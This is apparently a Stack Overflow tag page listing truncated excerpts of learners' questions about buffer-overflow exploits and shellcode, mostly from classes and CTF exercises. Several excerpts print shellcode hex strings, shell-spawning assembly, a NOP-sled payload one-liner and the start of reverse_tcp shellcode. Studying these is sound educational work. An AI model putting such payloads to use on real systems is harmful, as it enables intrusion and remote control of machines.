All Questions
Tagged with buffer-overflow shellcode
87 questions
0 votes · 1 answer · 54 views
Shellcode successfully executes /bin/sh but immediately terminates
I'm trying to solve a very simple exploiting challenge as exercise.
It is about injecting shellcode via buffer overflow, there is no ASLR and the stack is executable.
The payload I send is the ...
2 votes · 1 answer · 118 views
The Shellcode to open Calc.exe too long and complex, can't understand! My first exploit program
I wrote my first exploit program on Windows XP OS using the shellcode I found on the web. It opens the calculator and the overall program works successfully. However, even though I did not write the ...
0 votes · 2 answers · 46 views
Buffer overflow - set relevant text to be printed
#include <unistd.h>
char shellcode[] = "???";
int main(int argc, char* argv[]) {
int* ret;
ret = (int*) &ret + 2;
(*ret) = (int) shellcode;
}
I have to change shellCode ...
0 votes · 1 answer · 23 views
The address of an environment variable changes every time it is checked
I'm trying to learn how to use buffer overflow to change the address in esp to run a shell code; and I've defined an environment variable called "SHELLCODE" to store execution of the shell code, but ...
0 votes · 2 answers · 30 views
Buffer Overflow - Printing host/user-name
I'm trying to perform a Buffer overflow attack on a simple C program to get a bit of hands-on knowledge on how it works. So far I have a Python script which has a bunch of \x90s and the return address which ...
0 votes · 1 answer · 146 views
exporting environment variable with python
I'm trying to export an environment variable using python, but I can't seem to figure it out.
This is what I'm trying to copy:
export SHELLCODE = $(python -c "print <shellcode here>")
This is ...
0 votes · 1 answer · 87 views
Assembly version of C code to launch a shell
In buffer overflow assignment, I got a C file (call_shellcode.c) which contains an assembly version of the following C code which executes to open a shell:
#include <stdio.h>
#include <...
1 vote · 1 answer · 60 views
Buffer Overflow shellcode overwriting wrong address
NOTE: This is a modified version of my original post here but poses a slightly different question.
I am going through this video on buffer overflows but am having some trouble replicating the demo. ...
0 votes · 0 answers · 200 views
How to open a new terminal at bin/sh using shellcode?
I am currently taking a class dealing with Computer Security. I am researching basically how to open a command shell at "/bin/sh" by exploiting some poorly written C code. I have set everything up ...
2 votes · 1 answer · 142 views
Why does the amount of NOPs seem to impact whether shellcode is executed successfully?
I'm learning about buffer overflows (for educational purposes only) and while playing around with the NOP sliding technique to execute shellcode some questions arose as to why shellcode sometimes is ...
3 votes · 1 answer · 129 views
How can I use buffer overflow to both execute a program remotely and write the output to a socket?
I am working on a CTF challenge so this is not for any malicious purposes. I have successfully used buffer overflow to gain access to a remote system. However, my issue lies in the fact that I need ...
1 vote · 2 answers · 584 views
Difficulties injecting shellcode with buffer overflow
For an assignment I am doing, I must inject shellcode to execute execve(/bin/bash) into the following C program:
#include <stdio.h>
#include <string.h>
void return_input(void)
{
char ...
2 votes · 1 answer · 857 views
Illegal Instruction when trying to get shell from a simple stackoverflow
I'm trying to exploit the stack overflow vulnerability to get a shell. When I tried to run it, it shows illegal hardware instruction after executing the shellcode instead of giving a shell (error ...
0 votes · 2 answers · 371 views
shellcode buffer overflow - SegFault
I'm trying to run this shellcode but I keep getting segmentation fault
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include ...
0 votes · 0 answers · 78 views
ASM shell spawner works, but fails in buffer overflow implementation
I have my assembly code:
section .shellcode progbits alloc exec write align=16
global _start
_start:
xor rdx,rdx
xor rbx,rbx
xor rax,rax
xor rsi,rsi
xor rdi,rdi
mov qword rbx,0x68732f6e69622f2f
...
0 votes · 1 answer · 198 views
BOF with non exec stack
I'm trying to pass level 2 of this "game" http://smashthestack.org/faq.html (connect via ssh on the blackbox server) that consists of a basic buffer overflow.
In the directory /home/level2 (there ...
1 vote · 1 answer · 939 views
A buffer overflow exercise using a shellcode
I have been doing an exercise about a buffer overload on a C program; the goal of this problem is to get the root shell once I have inserted a shellcode into the program. This is what I have until now:
...
1 vote · 1 answer · 305 views
Buffer overflow change return address C - without main
How can I get the eip register to point to memory address to execute my shellcode in the following program using buffer overflow?
static int __init onload(void)
{
void function1(char *arg1)
{...
-1 votes · 2 answers · 257 views
(radare2, shellcode) int 0x80 jumping to invalid address
I'm executing a 32bit program (my arch is 64bit).
Vulnerable code:
#include <string.h>
#include <stdio.h>
void main(int argc, char *argv[]) {
copier(argv[1]);
printf("Done!\n");
}
...
0 votes · 0 answers · 97 views
buffer overflow task, cannot run shellcode
I have been struggling for 1 week and cannot figure this out. Please help.
My friend gave me an executable which is just a simple server and has buffer overflow vulnerability. My goal is to get a ...
1 vote · 1 answer · 213 views
Shellcode not executed properly
I am trying to solve Protostar stack5.
Here is a solution.
It puts the shellcode after the return address, I tried to put it before, in the array.
I have tried the shellcode, it works.
It seems ...
1 vote · 2 answers · 415 views
return to libc attack using a function pointer
How should I format my input for the return to libc attack in the following code:
void example_function(int x, const char *name)
{
void (*foo)(int, const char *) = http_serve_none;
char buf[...
1 vote · 0 answers · 506 views
Why reverse_tcp Shellcode doesn't work?
I am using this shellcode:
\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\...
0 votes · 1 answer · 404 views
Buffer overflow success only when using gdb
If I modify the return address directly with GDB, the buffer overflow succeeds and I can get a shell. However, when I don't use GDB, I can't get a shell with the same shell code. I can't find any difference between ...
2 votes · 0 answers · 249 views
Buffer overflow attack with shell code
I used this shell code for a buffer overflow attack:
$(python -c 'print "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x0f\x05\xc3"+"a"*31+"\x90\xe4\xff\xff\...
2 votes · 0 answers · 166 views
Shellcode Segfault - testcase vs strcpy
So after taking a Software Security class I became very interested in tinkering with how shellcode works with buffer overflows. Most threads I read about the topic involve having the shellcode as a ...
0 votes · 1 answer · 314 views
reverse move in stack without jmp
Update: Since I'm able to get the correct address into a register that I want to jump/call to, I think the best option would be to figure out a way to have self modifying code result in a jmp/call ...
0 votes · 0 answers · 393 views
Shellcode Without null bytes
I am trying to convert an assembly program into null-free shellcode.
However, I am unsure how to go about this for certain instructions. Some of them are way more complex than the examples I found in the ...
1 vote · 1 answer · 233 views
Can't Reproduce Buffer Overflow Without GDB
I have been trying to troubleshoot this problem for a while. I have checked a few StackOverflow links with similar problems, but none of the fixes seemed to work for me. For some reason, instead of ...
0 votes · 1 answer · 2k views
What is the size of a return address?
I know that this might sound a bit noobish, but I can't find this anywhere.
On a 64 bit machine, how many bytes is a return address? What about 32 bit?
The reason I am asking is because I am learning ...
-3 votes · 1 answer · 660 views
Aleph one code - buffer overflow [closed]
I got this code from Aleph One:
shellcode.h
#if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\...
1 vote · 1 answer · 1k views
Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential
I'm looking at Aleph's article in Phrack magazine. The code below can also be found there.
We have a vulnerable executable whose code is:
vulnerable.c
void main(int argc, char *argv[]) {
...
0 votes · 2 answers · 1k views
buffer overflow exploit change function call
I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? I know I will have to figure out how many bytes I have to enter until I have control over ...
1 vote · 2 answers · 1k views
Exploit Development - Shellcode Doesn't Work?
I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit.
Firstly, I found the position of EIP was after the 26089 As (at ...
0 votes · 1 answer · 535 views
get segmentation fault when executing shellcode
I'm trying to execute a program with shell code injected into the stack (program taken from the securityTube.net tutorial, Megaprimer buffer overflow); very good site (http://www.securitytube.net/)
Our ...
1 vote · 0 answers · 462 views
Issue with assembly when trying to spawn shell
I am working on a buffer overflow in C trying to get a shell to spawn. I have had little to no success in doing this. The closest I have gotten to accomplishing this was a segment fault when I believe ...
1 vote · 1 answer · 447 views
“Simple” buffer overflow in Windows 8
I'm trying to create two simple programs in C to simulate a buffer overflow:
first one accepts an input and copies it to the memory
second one abuses the first one to execute some shellcode that ...
1 vote · 2 answers · 2k views
Call function in buffer overflow
I'm learning about buffer overflows and found a challenge that has a program somewhat like this:
int main() {
do_something();
return 0;
}
void do_something() {
//get inputs
printf("...
0 votes · 1 answer · 281 views
Find out address of shellcode dynamically, placed on stack
I am using shellcode to spawn a shell. I am curious to find out the starting address of the shellcode dynamically, which is placed on the stack, and not hard-code the address in the shellcode.
Kindly share your ...
0 votes · 1 answer · 832 views
About buffer overflow shellcode position
I'm learning about exploits. In all BOF examples, the shellcode is always placed in the buffer => shellcode + padding + overwrite return addr. Is it possible to place the shellcode after the return address ...
2 votes · 0 answers · 482 views
Why is eip not being overwritten with the shellcode I am overflowing with?
So I am having to do a buffer overflow for an assignment and I feel like I am very close. I must note that my teacher has set up a VM for us to use in which if we are able to get shellcode into the ...
3 votes · 1 answer · 843 views
Write buffer overflow exploit — how to figure out the address of the shellcode?
When writing buffer overflow exploit, I understand that I'll need to input an array of length (address_of_return_address - address_of_buffer). And the array needs to be filled with the address of the ...
0 votes · 1 answer · 172 views
BufferOverflow shell not spawn
I'm trying a buffer overflow on a simple program
#include <stdio.h>
int main(int argc, char **argv)
{
char buf[8];
gets(buf);
printf("%s\n", buf);
return 0;
}
...
0 votes · 1 answer · 602 views
Solution to stack5.c (buffer stack overflow EIP) on x64
I am following the tutorials provided on the following links to learn how to insert shell code through a buffer overflow and redirecting your EIP/RIP towards properly crafted shell code to print you ...
-3 votes · 2 answers · 68 views
accessing a function that is defined after main
I have a C source file that I'm not allowed to change and it is defined as follows:
int main(int argc, char *argv[])
{
//doing something
return 0;
}
void __magic()
{
__asm__("jmp %esp");
}...
0 votes · 1 answer · 644 views
shellcode spawning a shell
I have my assembly code to spawn a shell:
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push eax
mov edx, esp
...
1 vote · 2 answers · 404 views
segmentation fault while running shellcode
I am experimenting with shellcode before digging deep into it so I came across an example from the shellcoders handbook. The example is the following:
char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\...
1 vote · 1 answer · 693 views
Inject Shellcode - program running and need to inject hexcode from maybe python
So I have a vulnerable program which is to be exploited using buffer overflow. After analysis I have all the relevant values (buffer size, the address to be injected, etc.)
The issue is that I need to ...
2 votes · 0 answers · 1k views
How to buffer overflow the 'gets' method in Ruby?
I wrote a client that gets input from the keyboard and stores it in a variable, like so:
x = gets
In C, normally memory is allocated for standard input and thus I can easily overflow the buffer and ...
-1 votes · 1 answer · 156 views
need to detect any possible buffer overflows
Hi guys, I need some help with this code. I want to know if there is any buffer overflow in this code. Basically this is an exercise for my university. We need to exploit it to open a shell. Until now ...